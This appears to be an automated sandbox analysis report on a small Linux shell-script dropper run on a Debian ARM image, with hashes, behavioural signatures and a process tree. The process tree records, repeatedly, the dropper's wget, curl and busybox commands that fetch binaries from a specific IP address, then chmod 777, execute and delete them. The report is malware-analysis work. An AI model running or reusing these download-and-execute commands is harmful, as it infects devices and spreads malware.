Analysis

  • max time kernel
    24s
  • max time network
    45s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    21/11/2024, 03:26

General

  • Target

    66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N

  • Size

    10KB

  • MD5

    15e750247f2724d961a7f702afe120f0

  • SHA1

    887ce46a3f6cb1d6488b9d07ef0cbdb6f34790d8

  • SHA256

    66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41

  • SHA512

    2c0737cc90e138cf6f5664efe3a4c346818e19faa3457e7512cb785bc8df9682b2ac3e80efbe2a0d61b5bd5ad28e98b840686691a89ee2105ff75bbf2b14dc7a

  • SSDEEP

    192:mDHJ7DHy7jn+771ds5ZxYIf7jnHwgpwZ5YwJp674o/amP08Ea1y1+1D0845ZBDH+:W6+7SXrIhof

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 25 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 25 IoCs
  • Checks CPU configuration 1 TTPs 25 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 50 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 25 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N
    /tmp/66d062c3c56d25200e9ec65a67063376df6a2d5b1a658cfc8d121c9034847e41N
    1⤵
      PID:658
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:660
        • /usr/bin/wget
          wget http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
          2⤵
            PID:662
          • /usr/bin/curl
            curl -O http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:676
          • /bin/busybox
            /bin/busybox wget http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
            2⤵
              PID:683
            • /bin/chmod
              chmod 777 hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
              2⤵
              • File and Directory Permissions Modification
              PID:687
            • /tmp/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
              ./hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
              2⤵
              • Executes dropped EXE
              PID:689
            • /bin/rm
              rm hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
              2⤵
                PID:691
              • /usr/bin/wget
                wget http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                2⤵
                  PID:692
                • /usr/bin/curl
                  curl -O http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                  2⤵
                  • Checks CPU configuration
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:694
                • /bin/busybox
                  /bin/busybox wget http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                  2⤵
                    PID:695
                  • /bin/chmod
                    chmod 777 noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                    2⤵
                    • File and Directory Permissions Modification
                    PID:696
                  • /tmp/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                    ./noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                    2⤵
                    • Executes dropped EXE
                    PID:697
                  • /bin/rm
                    rm noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                    2⤵
                      PID:700
                    • /usr/bin/wget
                      wget http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                      2⤵
                        PID:701
                      • /usr/bin/curl
                        curl -O http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                        2⤵
                        • Checks CPU configuration
                        • Reads runtime system information
                        • Writes file to tmp directory
                        PID:705
                      • /bin/busybox
                        /bin/busybox wget http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                        2⤵
                          PID:710
                        • /bin/chmod
                          chmod 777 BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                          2⤵
                          • File and Directory Permissions Modification
                          PID:714
                        • /tmp/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                          ./BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                          2⤵
                          • Executes dropped EXE
                          PID:716
                        • /bin/rm
                          rm BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                          2⤵
                            PID:718
                          • /usr/bin/wget
                            wget http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                            2⤵
                              PID:719
                            • /usr/bin/curl
                              curl -O http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                              2⤵
                              • Checks CPU configuration
                              • Reads runtime system information
                              • Writes file to tmp directory
                              PID:724
                            • /bin/busybox
                              /bin/busybox wget http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                              2⤵
                                PID:728
                              • /bin/chmod
                                chmod 777 j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                                2⤵
                                • File and Directory Permissions Modification
                                PID:732
                              • /tmp/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                                ./j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                                2⤵
                                • Executes dropped EXE
                                PID:734
                              • /bin/rm
                                rm j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                                2⤵
                                  PID:736
                                • /usr/bin/wget
                                  wget http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                  2⤵
                                    PID:738
                                  • /usr/bin/curl
                                    curl -O http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                    2⤵
                                    • Checks CPU configuration
                                    • Reads runtime system information
                                    • Writes file to tmp directory
                                    PID:742
                                  • /bin/busybox
                                    /bin/busybox wget http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                    2⤵
                                      PID:747
                                    • /bin/chmod
                                      chmod 777 izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                      2⤵
                                      • File and Directory Permissions Modification
                                      PID:753
                                    • /tmp/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                      ./izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                      2⤵
                                      • Executes dropped EXE
                                      PID:755
                                    • /bin/rm
                                      rm izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                      2⤵
                                        PID:758
                                      • /usr/bin/wget
                                        wget http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                        2⤵
                                          PID:761
                                        • /usr/bin/curl
                                          curl -O http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                          2⤵
                                          • Checks CPU configuration
                                          • Reads runtime system information
                                          • Writes file to tmp directory
                                          PID:765
                                        • /bin/busybox
                                          /bin/busybox wget http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                          2⤵
                                            PID:769
                                          • /bin/chmod
                                            chmod 777 vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:771
                                          • /tmp/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                            ./vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                            2⤵
                                            • Executes dropped EXE
                                            PID:772
                                          • /bin/rm
                                            rm vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                            2⤵
                                              PID:774
                                            • /usr/bin/wget
                                              wget http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                              2⤵
                                                PID:775
                                              • /usr/bin/curl
                                                curl -O http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                2⤵
                                                • Checks CPU configuration
                                                • Reads runtime system information
                                                • Writes file to tmp directory
                                                PID:776
                                              • /bin/busybox
                                                /bin/busybox wget http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                2⤵
                                                  PID:777
                                                • /bin/chmod
                                                  chmod 777 AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                  2⤵
                                                  • File and Directory Permissions Modification
                                                  PID:781
                                                • /tmp/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                  ./AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:783
                                                • /bin/rm
                                                  rm AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                  2⤵
                                                    PID:785
                                                  • /usr/bin/wget
                                                    wget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                    2⤵
                                                      PID:786
                                                    • /usr/bin/curl
                                                      curl -O http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                      2⤵
                                                      • Checks CPU configuration
                                                      • Reads runtime system information
                                                      • Writes file to tmp directory
                                                      PID:791
                                                    • /bin/busybox
                                                      /bin/busybox wget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                      2⤵
                                                        PID:796
                                                      • /bin/chmod
                                                        chmod 777 fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                        2⤵
                                                        • File and Directory Permissions Modification
                                                        PID:800
                                                      • /tmp/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                        ./fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                        2⤵
                                                        • Executes dropped EXE
                                                        PID:802
                                                      • /bin/rm
                                                        rm fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                        2⤵
                                                          PID:804
                                                        • /usr/bin/wget
                                                          wget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                          2⤵
                                                            PID:806
                                                          • /usr/bin/curl
                                                            curl -O http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                            2⤵
                                                            • Checks CPU configuration
                                                            • Reads runtime system information
                                                            • Writes file to tmp directory
                                                            PID:812
                                                          • /bin/busybox
                                                            /bin/busybox wget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                            2⤵
                                                              PID:818
                                                            • /bin/chmod
                                                              chmod 777 cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                              2⤵
                                                              • File and Directory Permissions Modification
                                                              PID:822
                                                            • /tmp/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                              ./cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                              2⤵
                                                              • Executes dropped EXE
                                                              PID:823
                                                            • /bin/rm
                                                              rm cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                              2⤵
                                                                PID:825
                                                              • /usr/bin/wget
                                                                wget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                2⤵
                                                                  PID:826
                                                                • /usr/bin/curl
                                                                  curl -O http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                  2⤵
                                                                  • Checks CPU configuration
                                                                  • Reads runtime system information
                                                                  • Writes file to tmp directory
                                                                  PID:827
                                                                • /bin/busybox
                                                                  /bin/busybox wget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                  2⤵
                                                                    PID:828
                                                                  • /bin/chmod
                                                                    chmod 777 nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                    2⤵
                                                                    • File and Directory Permissions Modification
                                                                    PID:829
                                                                  • /tmp/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                    ./nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                    2⤵
                                                                    • Executes dropped EXE
                                                                    PID:830
                                                                  • /bin/rm
                                                                    rm nHbisdjR87nM9vWnIHw7lGclq0KAPuM309
                                                                    2⤵
                                                                      PID:832
                                                                    • /usr/bin/wget
                                                                      wget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                      2⤵
                                                                        PID:833
                                                                      • /usr/bin/curl
                                                                        curl -O http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                        2⤵
                                                                        • Checks CPU configuration
                                                                        • Reads runtime system information
                                                                        • Writes file to tmp directory
                                                                        PID:834
                                                                      • /bin/busybox
                                                                        /bin/busybox wget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                        2⤵
                                                                          PID:835
                                                                        • /bin/chmod
                                                                          chmod 777 J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                          2⤵
                                                                          • File and Directory Permissions Modification
                                                                          PID:836
                                                                        • /tmp/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                          ./J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          PID:837
                                                                        • /bin/rm
                                                                          rm J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs
                                                                          2⤵
                                                                            PID:839
                                                                          • /usr/bin/wget
                                                                            wget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1
                                                                            2⤵
                                                                              PID:840
                                                                            • /usr/bin/curl
                                                                              curl -O http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1
                                                                              2⤵
                                                                              • Checks CPU configuration
                                                                              • Reads runtime system information
                                                                              • Writes file to tmp directory
                                                                              PID:841
                                                                            • /bin/busybox
                                                                              /bin/busybox wget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1
                                                                              2⤵
                                                                                PID:842
                                                                              • /bin/chmod
                                                                                chmod 777 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1
                                                                                2⤵
                                                                                • File and Directory Permissions Modification
                                                                                PID:843
                                                                              • /tmp/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1
                                                                                ./2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:844
                                                                              • /bin/rm
                                                                                rm 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1
                                                                                2⤵
                                                                                  PID:846
                                                                                • /usr/bin/wget
                                                                                  wget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp
                                                                                  2⤵
                                                                                    PID:847
                                                                                  • /usr/bin/curl
                                                                                    curl -O http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp
                                                                                    2⤵
                                                                                    • Checks CPU configuration
                                                                                    • Reads runtime system information
                                                                                    • Writes file to tmp directory
                                                                                    PID:848
                                                                                  • /bin/busybox
                                                                                    /bin/busybox wget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp
                                                                                    2⤵
                                                                                      PID:849
                                                                                    • /bin/chmod
                                                                                      chmod 777 Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp
                                                                                      2⤵
                                                                                      • File and Directory Permissions Modification
                                                                                      PID:850
                                                                                    • /tmp/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp
                                                                                      ./Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:851
                                                                                    • /bin/rm
                                                                                      rm Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp
                                                                                      2⤵
                                                                                        PID:853
                                                                                      • /usr/bin/wget
                                                                                        wget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA
                                                                                        2⤵
                                                                                          PID:854
                                                                                        • /usr/bin/curl
                                                                                          curl -O http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA
                                                                                          2⤵
                                                                                          • Checks CPU configuration
                                                                                          • Reads runtime system information
                                                                                          • Writes file to tmp directory
                                                                                          PID:855
                                                                                        • /bin/busybox
                                                                                          /bin/busybox wget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA
                                                                                          2⤵
                                                                                            PID:856
                                                                                          • /bin/chmod
                                                                                            chmod 777 shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA
                                                                                            2⤵
                                                                                            • File and Directory Permissions Modification
                                                                                            PID:857
                                                                                          • /tmp/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA
                                                                                            ./shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:858
                                                                                          • /bin/rm
                                                                                            rm shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA
                                                                                            2⤵
                                                                                              PID:860
                                                                                            • /usr/bin/wget
                                                                                              wget http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                                                                              2⤵
                                                                                                PID:861
                                                                                              • /usr/bin/curl
                                                                                                curl -O http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                                                                                2⤵
                                                                                                • Checks CPU configuration
                                                                                                • Reads runtime system information
                                                                                                • Writes file to tmp directory
                                                                                                PID:862
                                                                                              • /bin/busybox
                                                                                                /bin/busybox wget http://87.120.125.191/bins/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                                                                                2⤵
                                                                                                  PID:863
                                                                                                • /bin/chmod
                                                                                                  chmod 777 izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                                                                                  2⤵
                                                                                                  • File and Directory Permissions Modification
                                                                                                  PID:864
                                                                                                • /tmp/izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                                                                                  ./izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:865
                                                                                                • /bin/rm
                                                                                                  rm izUgwyiE7HQQ6Eh2VMWJV2prBcoLoWYtmk
                                                                                                  2⤵
                                                                                                    PID:867
                                                                                                  • /usr/bin/wget
                                                                                                    wget http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
                                                                                                    2⤵
                                                                                                      PID:868
                                                                                                    • /usr/bin/curl
                                                                                                      curl -O http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
                                                                                                      2⤵
                                                                                                      • Checks CPU configuration
                                                                                                      • Reads runtime system information
                                                                                                      • Writes file to tmp directory
                                                                                                      PID:869
                                                                                                    • /bin/busybox
                                                                                                      /bin/busybox wget http://87.120.125.191/bins/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
                                                                                                      2⤵
                                                                                                        PID:870
                                                                                                      • /bin/chmod
                                                                                                        chmod 777 hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
                                                                                                        2⤵
                                                                                                        • File and Directory Permissions Modification
                                                                                                        PID:871
                                                                                                      • /tmp/hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
                                                                                                        ./hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:872
                                                                                                      • /bin/rm
                                                                                                        rm hJacOX0JDY6JLwyURGHzxPUklQMfel7nND
                                                                                                        2⤵
                                                                                                          PID:874
                                                                                                        • /usr/bin/wget
                                                                                                          wget http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                                                                                                          2⤵
                                                                                                            PID:875
                                                                                                          • /usr/bin/curl
                                                                                                            curl -O http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                                                                                                            2⤵
                                                                                                            • Checks CPU configuration
                                                                                                            • Reads runtime system information
                                                                                                            • Writes file to tmp directory
                                                                                                            PID:876
                                                                                                          • /bin/busybox
                                                                                                            /bin/busybox wget http://87.120.125.191/bins/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                                                                                                            2⤵
                                                                                                              PID:877
                                                                                                            • /bin/chmod
                                                                                                              chmod 777 noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                                                                                                              2⤵
                                                                                                              • File and Directory Permissions Modification
                                                                                                              PID:878
                                                                                                            • /tmp/noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                                                                                                              ./noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:879
                                                                                                            • /bin/rm
                                                                                                              rm noh6gfPdweG0rYAYPYkKogwaWpt17SCXQY
                                                                                                              2⤵
                                                                                                                PID:881
                                                                                                              • /usr/bin/wget
                                                                                                                wget http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                                                                                                                2⤵
                                                                                                                  PID:882
                                                                                                                • /usr/bin/curl
                                                                                                                  curl -O http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                                                                                                                  2⤵
                                                                                                                  • Checks CPU configuration
                                                                                                                  • Reads runtime system information
                                                                                                                  • Writes file to tmp directory
                                                                                                                  PID:884
                                                                                                                • /bin/busybox
                                                                                                                  /bin/busybox wget http://87.120.125.191/bins/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                                                                                                                  2⤵
                                                                                                                    PID:886
                                                                                                                  • /bin/chmod
                                                                                                                    chmod 777 BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                                                                                                                    2⤵
                                                                                                                    • File and Directory Permissions Modification
                                                                                                                    PID:887
                                                                                                                  • /tmp/BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                                                                                                                    ./BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:888
                                                                                                                  • /bin/rm
                                                                                                                    rm BcF9ZLFW0C7jNoCdv2FYW3VzA2vt9G8wCY
                                                                                                                    2⤵
                                                                                                                      PID:890
                                                                                                                    • /usr/bin/wget
                                                                                                                      wget http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                                                                                                                      2⤵
                                                                                                                        PID:891
                                                                                                                      • /usr/bin/curl
                                                                                                                        curl -O http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                                                                                                                        2⤵
                                                                                                                        • Checks CPU configuration
                                                                                                                        • Reads runtime system information
                                                                                                                        • Writes file to tmp directory
                                                                                                                        PID:892
                                                                                                                      • /bin/busybox
                                                                                                                        /bin/busybox wget http://87.120.125.191/bins/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                                                                                                                        2⤵
                                                                                                                          PID:893
                                                                                                                        • /bin/chmod
                                                                                                                          chmod 777 j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                                                                                                                          2⤵
                                                                                                                          • File and Directory Permissions Modification
                                                                                                                          PID:894
                                                                                                                        • /tmp/j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                                                                                                                          ./j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:895
                                                                                                                        • /bin/rm
                                                                                                                          rm j3xQi6aixRPGDpe2I0L0XM2GfdFWMLGT61
                                                                                                                          2⤵
                                                                                                                            PID:897
                                                                                                                          • /usr/bin/wget
                                                                                                                            wget http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                                                                                                            2⤵
                                                                                                                              PID:898
                                                                                                                            • /usr/bin/curl
                                                                                                                              curl -O http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                                                                                                              2⤵
                                                                                                                              • Checks CPU configuration
                                                                                                                              • Reads runtime system information
                                                                                                                              • Writes file to tmp directory
                                                                                                                              PID:899
                                                                                                                            • /bin/busybox
                                                                                                                              /bin/busybox wget http://87.120.125.191/bins/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                                                                                                              2⤵
                                                                                                                                PID:900
                                                                                                                              • /bin/chmod
                                                                                                                                chmod 777 vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                                                                                                                2⤵
                                                                                                                                • File and Directory Permissions Modification
                                                                                                                                PID:901
                                                                                                                              • /tmp/vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                                                                                                                ./vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                                                                                                                2⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:902
                                                                                                                              • /bin/rm
                                                                                                                                rm vlANx3jqI5shlxw9IDsVwMFDB1xAgKPm5o
                                                                                                                                2⤵
                                                                                                                                  PID:904
                                                                                                                                • /usr/bin/wget
                                                                                                                                  wget http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                                                                                                  2⤵
                                                                                                                                    PID:905
                                                                                                                                  • /usr/bin/curl
                                                                                                                                    curl -O http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                                                                                                    2⤵
                                                                                                                                    • Checks CPU configuration
                                                                                                                                    • Reads runtime system information
                                                                                                                                    • Writes file to tmp directory
                                                                                                                                    PID:906
                                                                                                                                  • /bin/busybox
                                                                                                                                    /bin/busybox wget http://87.120.125.191/bins/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                                                                                                    2⤵
                                                                                                                                      PID:907
                                                                                                                                    • /bin/chmod
                                                                                                                                      chmod 777 AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                                                                                                      2⤵
                                                                                                                                      • File and Directory Permissions Modification
                                                                                                                                      PID:908
                                                                                                                                    • /tmp/AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                                                                                                      ./AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                                                                                                      2⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:909
                                                                                                                                    • /bin/rm
                                                                                                                                      rm AEIhwiWzXAxBDFIDXQEgVD3Y3NMuJUeXLj
                                                                                                                                      2⤵
                                                                                                                                        PID:911
                                                                                                                                      • /usr/bin/wget
                                                                                                                                        wget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                                                                                                        2⤵
                                                                                                                                          PID:912
                                                                                                                                        • /usr/bin/curl
                                                                                                                                          curl -O http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                                                                                                          2⤵
                                                                                                                                          • Checks CPU configuration
                                                                                                                                          • Reads runtime system information
                                                                                                                                          • Writes file to tmp directory
                                                                                                                                          PID:913
                                                                                                                                        • /bin/busybox
                                                                                                                                          /bin/busybox wget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                                                                                                          2⤵
                                                                                                                                            PID:914
                                                                                                                                          • /bin/chmod
                                                                                                                                            chmod 777 fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                                                                                                            2⤵
                                                                                                                                            • File and Directory Permissions Modification
                                                                                                                                            PID:915
                                                                                                                                          • /tmp/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                                                                                                            ./fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                                                                                                            2⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:916
                                                                                                                                          • /bin/rm
                                                                                                                                            rm fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4
                                                                                                                                            2⤵
                                                                                                                                              PID:918
                                                                                                                                            • /usr/bin/wget
                                                                                                                                              wget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                                                                                                              2⤵
                                                                                                                                                PID:919
                                                                                                                                              • /usr/bin/curl
                                                                                                                                                curl -O http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                                                                                                                2⤵
                                                                                                                                                • Checks CPU configuration
                                                                                                                                                • Reads runtime system information
                                                                                                                                                • Writes file to tmp directory
                                                                                                                                                PID:920
                                                                                                                                              • /bin/busybox
                                                                                                                                                /bin/busybox wget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                                                                                                                2⤵
                                                                                                                                                  PID:921
                                                                                                                                                • /bin/chmod
                                                                                                                                                  chmod 777 cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy
                                                                                                                                                  2⤵
                                                                                                                                                  • File and Directory Permissions Modification
                                                                                                                                                  PID:922
